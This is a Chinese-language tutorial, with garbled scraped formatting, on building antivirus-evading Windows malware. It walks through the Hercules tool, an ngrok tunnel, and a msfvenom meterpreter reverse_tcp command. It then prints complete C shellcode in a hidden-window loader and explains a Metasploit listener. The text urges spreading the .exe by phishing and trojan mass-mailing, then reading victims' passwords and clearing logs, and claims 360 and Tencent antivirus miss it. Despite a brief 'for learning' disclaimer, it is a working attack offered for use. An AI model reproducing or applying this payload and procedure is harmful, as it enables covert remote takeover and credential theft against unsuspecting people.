本篇文章適用學習,維護網絡安全,作合法公民linux
介紹:以前使用 小七免殺工具包 來做免殺(有空我就上傳到網盤),免殺就是對PE(.bat、.exe等)文件中出現的特徵碼進行替換修改,方法有等價替換指令,字符串修改大小寫、互補等。git
現在開源的東西比起手工來作,不只免殺率高,速度快,功能多,並且會長期維護。下面我就介紹下 Hercules 工具:github
須要安裝虛擬機,運行下載的.iso(若是不用Kali,BT5也能夠,Kali是BT系列的升級版)。sql
解壓到 /usr/local
目錄下:shell
讓GO命令有效:windows
文件後追加 export PATH=$PATH:/usr/local/go/bin
:安全
再按 Esc
,保存退出。查看是否正確配置:服務器
升級軟件包:網絡
選擇(1),輸入ip、端口號(用於反彈回連),以後依次輸入y及要生成的文件名,很簡單就不截圖了。框架
文件生成後,在 在線查毒網站 檢測下,顯示不少殺毒軟件都檢測不到。
Kali Linux 上訪問 ngrok網站(使用花生殼作內網穿透也能夠),註冊登錄,而後點擊隧道管理進入:
點擊確認添加,這樣隧道就建立完成:
進入Kali,下載運行 ngrok客戶端 地址:https://www.ngrok.cc/#down-cl...,下載linux的版本
成功運行ngrok客戶端後,內網穿透就弄好了,外網地址就是下圖中的 server.nogrok.cc: 註冊隧道的端口號
使用MetaSpolit Framework簡稱Msf框架。
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b ‘\x00’ lhost=server.ngrok.cc lport=00000 -f c
-p 指定payload,–e 編碼器,-i 編碼次數(次數越多免殺概率越高),-b 去除壞字符,lhost 服務器(ngrok默認爲server.ngrok.cc) lport 隧道的端口,-f 生成指定格式(py、exe等,建議生成c)
若是-f指定的是c,則將輸出的buf[]複製出來:
這個就不貼圖了,直接貼代碼了
#include <stdio.h> #pragma comment(linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"") // 運行時不顯示窗口 unsigned char buf[] = "\xbb\xa1\x7d\x04\x59\xda\xca\xd9\x74\x24\xf4\x5d\x31\xc9\xb1" "\x9e\x31\x5d\x14\x03\x5d\x14\x83\xed\xfc\x43\x88\xba\x1e\xde" "\x61\xa6\x7a\x33\x5c\x5c\x5f\x47\x07\xae\x56\x16\x2f\x53\xa8" "\x5c\x61\x24\x38\x5f\xf1\xd5\xd8\xed\x77\x1f\xc2\xb5\x4f\x0b" "\x05\xb8\x9c\x44\xf1\x31\x77\xdc\x47\x2f\xaf\xa7\xf5\x50\xa9" "\xa3\x45\xb7\x52\x62\x52\x8e\xb9\x03\x5e\xcd\x1f\xb8\xec\xa8" "\x64\x3e\x96\x16\x0d\x3e\x5d\x30\x53\xa7\xcf\xf0\xd0\xaa\x32" "\xe5\x6b\x12\x74\x50\xcb\xdd\x12\x89\xde\x29\x03\xca\xcb\xb8" "\x2c\xd8\xdf\x42\xf8\xa2\x42\xdd\xdc\x31\xe8\x15\xe9\x40\x87" "\x3c\x4b\xf7\x79\x30\x7b\x33\xee\xcc\x46\xa6\x17\x39\x57\xec" "\xf0\xcc\x6d\xe3\x17\xf5\xe8\x5c\xc4\xd4\xbb\x26\x8c\xc0\x0e" "\xe3\xab\xc6\xad\x84\x0d\x25\x9c\x37\x30\xd0\x3c\x81\x9e\x29" "\x8b\xb5\xec\xd2\xbf\x01\xf0\xc6\x0d\xde\xa8\x9b\xe5\x72\x88" "\x00\x21\xd8\xac\x78\xb4\xe7\x70\x05\xda\xe3\xa9\xaf\xcf\x2c" "\x04\x6a\xe7\x0d\x2c\xc3\xce\x3a\x48\x0f\x94\xac\xb9\xb8\xcb" "\xa6\xdf\xed\xf8\x1d\x75\x4e\x16\x78\xb6\xe8\x0c\x07\x48\x84" "\xce\x79\xd4\xa0\x68\x8f\xc5\xd4\xde\x31\x13\x27\x4e\xa7\xaf" "\x51\x54\x8a\x12\x1a\xb7\x8a\x97\x60\x10\x48\x01\x6c\x39\x46" "\x40\x07\x8d\xe1\x19\xf4\x65\x25\x87\xd5\x27\x8b\x11\x7f\xcb" "\xd2\x30\x0f\x91\x2f\x30\x55\x1d\x7d\xef\xb0\x03\x98\x59\x0e" "\x29\xc5\xbd\x6c\x8b\xe1\x84\x8f\xee\xc9\x22\xe9\x62\xf1\x06" "\x19\xf1\xbe\xa5\x8c\x88\xed\xc2\x71\x70\x01\x59\x4c\x15\x5a" "\xe4\xe8\x75\x3c\xdc\x96\xd5\x41\x70\xe3\x60\x7d\x45\x29\x56" "\xd2\xf4\x73\xb5\x06\xc7\xba\x53\x22\xdd\xbd\x5d\x89\x91\xe6" "\x72\xfc\x75\x37\xbc\xed\xbb\x16\x05\x01\x56\x3a\x32\x72\x69" "\x93\xec\xa4\x7b\x33\xff\xd7\x92\x7d\x1c\xef\xd7\x75\x7d\x45" "\x5f\x67\x47\x2b\x90\x9b\x6e\x82\xb4\x17\xcd\x3b\x45\x8b\x4d" "\x45\x50\x71\xeb\xb9\x49\x42\x64\xd7\x0c\x67\x61\xee\x21\x6e" "\x78\x7e\x32\x26\xe7\x65\x10\x9d\x69\x46\x21\x2f\x97\x3c\x3d" "\xbe\xd7\x06\x2f\x5b\x81\xae\xe9\x22\x6d\xdc\x6d\x2f\x64\xfb" "\xc1\xe1\xae\xf6\xc6\x0a\x73\x52\x10\x7c\xb0\x3f\xf2\x60\x69" "\xaf\x05\x6a\xa6\x2a\x53\xec\xb8\x73\xdd\xd3\x2c\x82\xab\x64" "\x97\xf3\xdb\xe8\x2f\x22\x50\xde\xf4\x2e\x97\x8a\x79\xf4\xdc" "\x92\x37\x45\x23\x86\x63\x42\x5e\x98\xc2\x49\xc3\x1d\x34\x1d" "\xac\x24\x76\xef\xd7\x69\x8d\xd2\x2c\x40\x1c\xa2\x36\x29\x6c" "\xa5\x25\x01\xd7\xbd\x7c\x15\x54\x07\xaa\x2c\x5a\xeb\x53\x6d" "\x3b\x3a\x45\x50\x6d\x4f\x96\xb3\xf9\xdb\x96\x29\x0d\x6a\xa9" "\x58\x9f\xf0\x14\xc3\x79\x0c\x99\x3c\x58\xc0\x61\xb6\xca\x5d" "\x61\x9f\xf9\x65\x99\xb4\x91\xac\x5d\x7c\xf5\x9c\x99\xe5\x60" "\x99\xc9\x8d\xcb\xe7\xd4\xc3\x5c\xd6\x39\xd4\xe0\x71\x73\xa2" "\x24\xdd\x3c\xb4\x82\xda\x2c\xaf\xa5\x1e\x48\xa7\xf5\x89\x4d" "\xb6\x10\x74\xe5\x06\xf2\x5b\xfa\x3c\x58\x84\xc6\x68\x16\x8b" "\x26\x7a\x2f\x2a\x0c\x40\xf8\x61\x8b\x49\x14\x27\xf7\xe5\x4f" "\x9a\xe3\x47\xb7\x1a\x13\xe9\x16\x06\x84\xab\x70"; main() { ((void(*)(void))&buf)(); }
編譯.cpp,生成.exe。
接下來咱們還要配置Msf反向端口監聽。
Msf前先運行psql(新版Msf加入了psql的支持):
配置Msf利用:
這時咱們就大功告成了,只需等待客戶端運行咱們的.exe(釣魚掛馬羣發等方式散播)
運行.exe,Msf顯示已經回連,以後的操做就跟windows同樣了,讀取對方密碼、目錄、清log等等。。。
通過運行,360、騰訊殺毒軟件沒有檢測出來問題。。。